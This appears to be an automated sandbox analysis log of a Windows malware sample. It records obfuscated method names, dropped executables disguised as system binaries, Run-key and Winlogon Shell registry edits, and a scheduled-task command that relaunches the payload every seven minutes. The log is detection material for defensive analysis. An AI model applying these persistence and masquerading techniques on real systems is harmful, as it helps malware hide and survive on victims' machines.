Source: lv961v43L3.exe, kSEISMY6Kbn8y5TYhNU.cs High entropy of concatenated method names: 'YQ1Ypj3Slr', 'yWjYbyVbbs', 'MBfIIN1MmHygSRCBQMve', 'XFxrtm1M771EROg2qK0e', 'kKclxO1MojnSY4KfAphu', 'cbGZKj1Mz3uO9rVM3ySg', 'I84YPFrjov', 'fk0YSnJuX7', 'lmcY22RPek', 'aw5YB4lBa5'
Source: lv961v43L3.exe, RqFJcpeQHUffHiSIlUQ.cs High entropy of concatenated method names: 'P9X', 'CCj1eK3CoHk', 'imethod_0', 'eD2edc9MPh', 'rVih5U1k4rlJSPHKJ9t4', 'XXFCZY1kRSS3LiTV6OOo', 'hNLp671k8DHsqeEu3sm3', 'I9QN1O1kJ3bFaCgKqHEb', 'lUjsWy1kArANCT0AJDjQ'
Source: lv961v43L3.exe, K6aLN1eUbvOHT60U5LK.cs High entropy of concatenated method names: 'kSfeC5RK8a', 'ukMeG9jquG', 'JCWeZLcgTY', 'yExeD1TbnN', 'Bg5eMLJKHn', 'qcgekxoEQO', 'U4w0Al1k6U3aJRIB5wxy', 'PVO6FZ1kdQJBQkkDRJwl', 'ygVmZc1kPCysq3rwK7MD', 'wg5J4n1kSqNNtBX2oC7J'
Source: lv961v43L3.exe, TjVjbjYOQdfpvXj0bmg.cs High entropy of concatenated method names: 'Tr6Y9NihF2', 'YgbYKOW5pH', 'nrQNUq1MupEHmN44sWoP', 'OWwQjL1M9nnCyElb2o0K', 'Fw97Gx1MKHSeD7FZOKdc', 'WRmbIv1Mq4mCXafdYC80', 'EfArqE1MssXDdafHVotm', 'ndTcL71M5721qulN7DqS'
Source: lv961v43L3.exe, eSYeyZTjYmGU4EfKYGm.cs High entropy of concatenated method names: 'XAoTZImrTP', 'CgvTKnuWZI', 'hsiTuvt2AY', 'sjrTqcwJjE', 'dYETsnnd3O', 'yM3T5QL1Xs', 'hmtTWp0mNv', 'uobTyR5LJw', 'tpLTEdvUsl', 'uxSTh0r0CZ'
Source: lv961v43L3.exe, PoIBOJMtlxREqmWub4a.cs High entropy of concatenated method names: 'Close', 'qL6', 'hMqMwQAquV', 'kHsMihZDhN', 'dcOMlKwby4', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
Source: lv961v43L3.exe, TGpGplDVQJDAt2sGmkx.cs High entropy of concatenated method names: 'CB1MqStfIx', 'E8131u14gtCEwraXkCkG', 'K5KWXb14BOuhSUnEHnsW', 'eJbxhk14NhbEV70db2vm', 'hltwt1144cmnD1fVXoh2', 'kt5', 'KH7DaYX8hb', 'ReadByte', 'get_CanRead', 'get_CanSeek'
Source: lv961v43L3.exe, zDoKQqCePTu7x98SBAd.cs High entropy of concatenated method names: 'lTDCjrPGr3', 'gAbC97jG9v', 'egQCKeqZMT', 'KXBGGE1N0YD5MGY4rU0B', 'HWi4l91N1kBWtuhqtaS9', 'O01cii1NIsQwJiExVYsO', 'Y0Cuq81NfnVdVMmMf7hb', 'ECM6aB1NLJNCWj9el2iv'
Source: lv961v43L3.exe, Q51Kh2ckRTl4CV4xfRc.cs High entropy of concatenated method names: 'P83', 'KZ3', 'TH7', 'imethod_0', 'vmethod_0', 'fQT1ejtsfkY', 'Qt91L1x8x8D', 'OwIGiC1DihTup5UJhwkq', 'LQotCL1DlP5ZyuJmVI4D', 'SGQngv1DQUNbvB0aDgoO'
Source: lv961v43L3.exe, WmN0DeiOdIDwZqSnEqC.cs High entropy of concatenated method names: 'fx9iFih9Sw', 'kbfp5R1J5E9aghyQu6P8', 'EXZ5ZV1JWuHgWD8lqcwr', 'U9TGgH1JqDT7fIGYoEcV', 'RNG5Sx1JsPc7Su42x1nU', 'pvRbR01JyAEg5iqj3wYe', 'IPy', 'method_0', 'method_1', 'method_2'
Source: lv961v43L3.exe, P62RspADEyGbNfhjRHB.cs High entropy of concatenated method names: 'U7MAkiEtiu', 'JUWAtCmO8j', 'YRjAvT36wg', 'eUoAw0v7Aw', 'wVUAisly2F', 'TamAlYxKnw', 'l0fAQFhFwu', 'ExFA6bVpdm', 'E9CAdUyfpM', 'hdLAPixNlP'
Source: lv961v43L3.exe, Jimxh6hXHLnckmS2Yf4.cs High entropy of concatenated method names: 'aeFhvg33nL', 'XxeGgG1l7mnNKBtK2COQ', 'UMZvdv1lpYJA42MgmKqG', 'jLC62Q1lbcKwrGVR8co8', 'yc6hGJWyZT', 'oMphZjMks0', 'iZphDGP3I1', 'CaIQFE1lJ1dWfiYaV5X0', 'CpnWRi1lRerd3uroI6Ic', 'BIXpvS1l8vEdiskwvShc'
Source: lv961v43L3.exe, DiIJIfsaJ7QibHvLJoL.cs High entropy of concatenated method names: 'T2VhucfHSt', 'r2NhqyItpg', 'p7vC4X1lvX1cem1lc2vu', 'S1hKHK1lkKqqU4WWa2j1', 'aJH5jt1ltZZ178K36vIN', 'kUuXSI1lwbLGx9fYDdLi', 'dfcFvA1li0VJtUiWvcNQ', 'QoQhhpZOfA', 'Xs89Z61ldLMOQr4KtmQR', 'PfbkTg1lQGZW75HhJGCX'
Source: lv961v43L3.exe, of2sKynP4f5LUZUve59.cs High entropy of concatenated method names: 'm4CngLRwCR', 'obmHes1DLXsBZ3T4fOrP', 'RIxWQ71DISEJ0ZECBiQY', 'Qc3kO61DfWL03n8iA6wW', 'eBhK9W1DnJq4VNLGvqmq', 'U1J', 'P9X', 'SQp1L5pyJEJ', 'fF91LWYp2LQ', 'ouL1eY4nnIO'
Source: lv961v43L3.exe, RQTAP3f4CUXXgQhemCv.cs High entropy of concatenated method names: 'O17LfYkndL', 'CeOLL8Nxc2', 'uaeLnha3le', 'EoGArM1GcU5H1OHV40yE', 'bvRf0c1GYielEbotcsBJ', 'FkFR901Gei5ctA2YQFrP', 'UwpL9T0RmR', 'AvCSBP1Gjc7qBeUKs5AP', 'DNDRtR1G9G6J7EVXJZgr', 'GwVLqVSAU1'
Source: lv961v43L3.exe, ge5lHheWZO0iPq6waS3.cs High entropy of concatenated method names: 'Coie3qm8pj', 'VURqnL1kHyUSv1UVYkNQ', 'VdqARV1kToysom0pTEML', 'gmQxaD1kFBD8fuj0O3NS', 'lq8AGA1kxmTVkvpbvqKt', 'RV9eEkuEZo', 'n5PT7h1k3LiHH7oT0GeC', 'cFO6w11kVgEvbAoHtnjI', 'tDVcoU1kEApcmQGKZKnS', 'H2lrbt1kh5lXwjf79o1f'
Source: lv961v43L3.exe, pbacEfYhTLQy4TEZ6WQ.cs High entropy of concatenated method names: 'DsMYXSq7Te', 'jVW0EJ1MvkZ12OkU7W2l', 'jTDIHE1MkJODAHtmxI5O', 'qYL5Bv1MtYv6hBpV9r9b', 'IqxYVY2NJ1', 'w7bYr09XZU', 'bCJYa5HbNa', 'xlLYT3hugk', 'xbwqE01MUZFnbnaRiGS3', 'e8y61P1MH7TILCst26DR'
Source: lv961v43L3.exe, nAIjcVX8KMtXnlU66eV.cs High entropy of concatenated method names: 'BPNXA2yKM5', 'PBvXpnGOy5', 'TFxXbST0hW', 'YSZX7JuNtX', 'Nm5XoawmUs', 'Tdb6Lm1B2cHbfbP4Co1s', 'nmDBVA1BPvtTEjvY5Udj', 'U8b86Q1BSAydyS0Ia5qW', 'qpGRmB1BBBpcF5oDsKyZ', 'rWUcSg1BN43PklxC8yQ4'
Source: lv961v43L3.exe, hS91OlQtiUA9FMwgi77.cs High entropy of concatenated method names: 't90L3W1AAf1pHYMJvh2L', 'mXyu1X1ApsQ67p5N7S20', 'FObCTx1A8udi503umOuM', 'zkngrw1AJHxMRuW2VplA', 'kmYVnL1A4DgpBY3illqI', 'v6WmBj1ANfUKOCBtcT2i', 'zyInQY1AgEc78byGURQ7'
Source: lv961v43L3.exe, R5lPNHLHaXrhyBX1DDq.cs High entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'hW61ef63ING', 'Qt91L1x8x8D', 'RFF9ev1GxUdCZEJTAsxq', 'Vn1trZ1GUYUZdsJxiV2T', 'xsjvo81GXBF9K6H0vKPB'
Source: lv961v43L3.exe, BcuYUllblrQPKrLi5ON.cs High entropy of concatenated method names: 'p4OloER99Y', 'Y9ylm6WjQu', 'gQXlzi9lMJ', 'akIQ03oOZO', 'mj2Q1NST7r', 'LiPQIC0xse', 'c2PQfob6v2', 'BlqQLjZK4O', 'DY7QnfnGM2', 'joPQcaKrgd'
Source: lv961v43L3.exe, xPG7nX3gHT1rPM4ojrx.cs High entropy of concatenated method names: 'KF01eWgmekR', 'GX83RLKxdj', 'keH1ey6FkD9', 'SpGht616VvTwx6qksGq0', 'eRifnm16rKvQfthJEDAx', 'byUoGV16hl6ZbO8Lf6ab', 'uE9K2b163G5elrCo7KiN', 'lXkdiW16aDwABrgxNlGr', 'BhhEiq16TWuOGjie0oa2', 'OBKuSe16FNKwdBD2e0fE'
Source: lv961v43L3.exe, LDdA7hUfxejBNf3yW9L.cs High entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'bl6Un7dve6', 'Write', 'Bf4UcZreW2', 'HnlUYZVQOT', 'Flush', 'vl7'
Source: lv961v43L3.exe, U9kHoS1E9uyTmInARU0.cs High entropy of concatenated method names: 'RTM', 'KZ3', 'H7p', 'eeS', 'imethod_0', 'XbG', 'PdN1YzfY3sc', 'Qt91L1x8x8D', 'YX5EV71UrjZ0CRQtoMO6', 'IahgNB1Uaq0hAsCFwKhN'

Persistence and Installation Behavior

barindex
Source: C:\Users\user\Desktop\lv961v43L3.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\lv961v43L3.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\lv961v43L3.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\lv961v43L3.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\lv961v43L3.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\lv961v43L3.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\lv961v43L3.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\lv961v43L3.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\lv961v43L3.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\lv961v43L3.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\lv961v43L3.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\lv961v43L3.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\lv961v43L3.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\lv961v43L3.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\lv961v43L3.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\lv961v43L3.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\lv961v43L3.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\lv961v43L3.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: unknown Executable created and started: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
Source: unknown Executable created and started: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe
Source: unknown Executable created and started: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe System file written: C:\Windows\System32\SecurityHealthSystray.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\Desktop\gBplMliu.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Recovery\apERZQztEJsqymITPFxguVe.exe Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File created: C:\Users\user\Desktop\oTYKBhgS.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\Desktop\ExWQYAoA.log Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Windows\System32\SecurityHealthSystray.exe Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File created: C:\Users\user\Desktop\zpwiWXhy.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\Desktop\DBipIDSx.log Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\Desktop\QaswzdXY.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File created: C:\Users\user\Desktop\XuBMTZHB.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\Desktop\UQjmGZYR.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File created: C:\Users\user\Desktop\ekFuRFbl.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File created: C:\Users\user\Desktop\HkLqVmri.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File created: C:\Users\user\Desktop\ysVaBXSD.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File created: C:\Users\user\Desktop\yHDAltbA.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\Desktop\MnaxWgIk.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\Desktop\sVoRDbyU.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\Desktop\xIFQfYNI.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File created: C:\Users\user\Desktop\Gnkizmcn.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File created: C:\Users\user\Desktop\SzzvMtRI.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\Desktop\BQDZBqHE.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File created: C:\Users\user\Desktop\LRfgsxYe.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\Desktop\KzWplSMm.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\Desktop\OpNfsPNf.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File created: C:\Users\user\Desktop\Babyelsr.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File created: C:\Users\user\Desktop\blrDaWHv.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File created: C:\Users\user\Desktop\KdaYGjcg.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\Desktop\CEHhnDDC.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\Desktop\ksfcTiin.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\Desktop\kjvJoyHh.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\Desktop\aJMMjFdF.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File created: C:\Users\user\Desktop\jFctadEf.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\Desktop\HrZgPASq.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File created: C:\Users\user\Desktop\kTLTKyNc.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\Desktop\erTkMTCt.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File created: C:\Users\user\Desktop\rJPAIehM.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\Desktop\yGhYBYcD.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File created: C:\Users\user\Desktop\pHdSnvcQ.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File created: C:\Users\user\Desktop\ciTLwWWp.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\Default\SystemSettings.exe Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File created: C:\Users\user\Desktop\vzGrPbhF.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\Desktop\aBctEWCA.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\Default\SystemSettings.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Windows\System32\SecurityHealthSystray.exe Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\Desktop\gBplMliu.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\Desktop\erTkMTCt.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\Desktop\OpNfsPNf.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\Desktop\DBipIDSx.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\Desktop\kjvJoyHh.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\Desktop\aBctEWCA.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\Desktop\KzWplSMm.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\Desktop\BQDZBqHE.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\Desktop\yGhYBYcD.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\Desktop\ExWQYAoA.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\Desktop\UQjmGZYR.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\Desktop\MnaxWgIk.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\Desktop\CEHhnDDC.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\Desktop\sVoRDbyU.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\Desktop\ksfcTiin.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\Desktop\aJMMjFdF.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\Desktop\QaswzdXY.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\Desktop\HrZgPASq.log Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\Desktop\xIFQfYNI.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File created: C:\Users\user\Desktop\jFctadEf.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File created: C:\Users\user\Desktop\LRfgsxYe.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File created: C:\Users\user\Desktop\ysVaBXSD.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File created: C:\Users\user\Desktop\Babyelsr.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File created: C:\Users\user\Desktop\kTLTKyNc.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File created: C:\Users\user\Desktop\blrDaWHv.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File created: C:\Users\user\Desktop\KdaYGjcg.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File created: C:\Users\user\Desktop\zpwiWXhy.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File created: C:\Users\user\Desktop\pHdSnvcQ.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File created: C:\Users\user\Desktop\XuBMTZHB.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File created: C:\Users\user\Desktop\Gnkizmcn.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File created: C:\Users\user\Desktop\vzGrPbhF.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File created: C:\Users\user\Desktop\ciTLwWWp.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File created: C:\Users\user\Desktop\SzzvMtRI.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File created: C:\Users\user\Desktop\rJPAIehM.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File created: C:\Users\user\Desktop\HkLqVmri.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File created: C:\Users\user\Desktop\yHDAltbA.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File created: C:\Users\user\Desktop\oTYKBhgS.log Jump to dropped file
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File created: C:\Users\user\Desktop\ekFuRFbl.log Jump to dropped file

Boot Survival

barindex
Source: C:\Users\user\Desktop\lv961v43L3.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run apERZQztEJsqymITPFxguVe Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run apERZQztEJsqymITPFxguVe Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemSettings Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lv961v43L3 Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\Default\SystemSettings.exe Jump to dropped file
Source: C:\Users\user\Desktop\lv961v43L3.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "apERZQztEJsqymITPFxguVea" /sc MINUTE /mo 7 /tr "'C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe'" /f
Source: C:\Users\user\Desktop\lv961v43L3.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run apERZQztEJsqymITPFxguVe Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run apERZQztEJsqymITPFxguVe Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemSettings Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemSettings Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lv961v43L3 Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lv961v43L3 Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lv961v43L3 Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lv961v43L3 Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run apERZQztEJsqymITPFxguVe Jump to behavior
